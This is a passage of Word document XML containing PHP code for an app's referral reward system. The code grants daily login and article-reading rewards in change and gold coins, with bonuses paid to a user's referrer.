        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入您的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;"."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再领￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$money_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA93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52BB6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FF9F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A9B2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if($s1 &amp;&amp; $yaoqing['money_login_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631F9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徒弟每日登录奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164CA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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F9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46AB4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1CA3F6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'uid'=&gt;$s1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593539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'money'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC7C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'money'=&gt;$yaoqing['money_login_s1']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16303D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'content'=&gt;$content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B0EF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F0A6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3AA7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326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3CFA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if($yaoqing['jinbi_login']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E7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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日登录奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C9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35E92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$jinbi_login_money=$yaoqing['jinbi_login'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3014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$db=_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059FD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'uid'=&gt;$uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60328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'jinbi'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5F1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'money'=&gt;$jinbi_login_money,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322567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'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日登录奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F53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0015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9478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846E5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if(empty($ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DF1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json_encode(['ret'=&gt;['h1'=&gt;$jinbi_login_money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恭喜每天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$jinbi_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入您的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;"."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再领</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$money_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544962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5DA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9A14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357D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1FF2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if($s1 &amp;&amp; $yaoqing['jinbi_login_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AADDB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徒弟每日登录奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC977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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0466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9E212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30F8BE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'uid'=&gt;$s1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3E3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'jinbi'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17574B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'money'=&gt;$yaoqing['jinbi_login_s1'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF8F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'content'=&gt;$content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60C9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0D7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B41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4A39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9AFE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if($type=='money_news'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10EA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if($yaoqing['money_news'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605D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阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C5F8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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;['like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD01C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3DBF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if($this-&gt;member['yaoqing']['news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C297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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setInc('news_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593485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4EFAEE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AF1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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setField('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584ADA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$money=$yaoqing['money_news'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6C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7C242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11940C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77AEA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01D535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6B655E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EB2B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F7E5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332CC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$ret=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你今日已阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日再阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章可获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1231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135E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2C3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D537D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if($yaoqing['money_news_s1'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271333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徒弟阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B19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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;['like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟阅读奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069C1E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E5134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if($this-&gt;member['yaoqing']['news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57FD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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setInc('news_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56939A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779895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BA8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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setField('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F547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$money=$yaoqing['money_news_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD43D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1B5706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74A34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37FFBC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68E42E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14CC1D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96CD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44ED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58EE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D37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if($yaoqing['jinbi_news'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BF9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阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA286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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;['like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18160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FADDD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if($this-&gt;member['yaoqing']['news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C23A1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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setInc('news_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA47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759749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E6FC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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setField('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03789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$money=$yaoqing['jinbi_news'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D08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43025F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4D17CD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25430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186AE2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577FA5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F1CD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5BF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0463AC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if(empty($ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE466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json_encode(['ret'=&gt;['h1'=&gt;''.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你今日已阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日再阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章可获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D2D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1290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49C9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D5B2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37D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if($yaoqing['jinbi_news_s1'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B5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徒弟阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282D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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;['like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50824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1232F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if($this-&gt;member['yaoqing']['news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFE5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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setInc('news_num');</w:t>
      </w:r>
    </w:p>
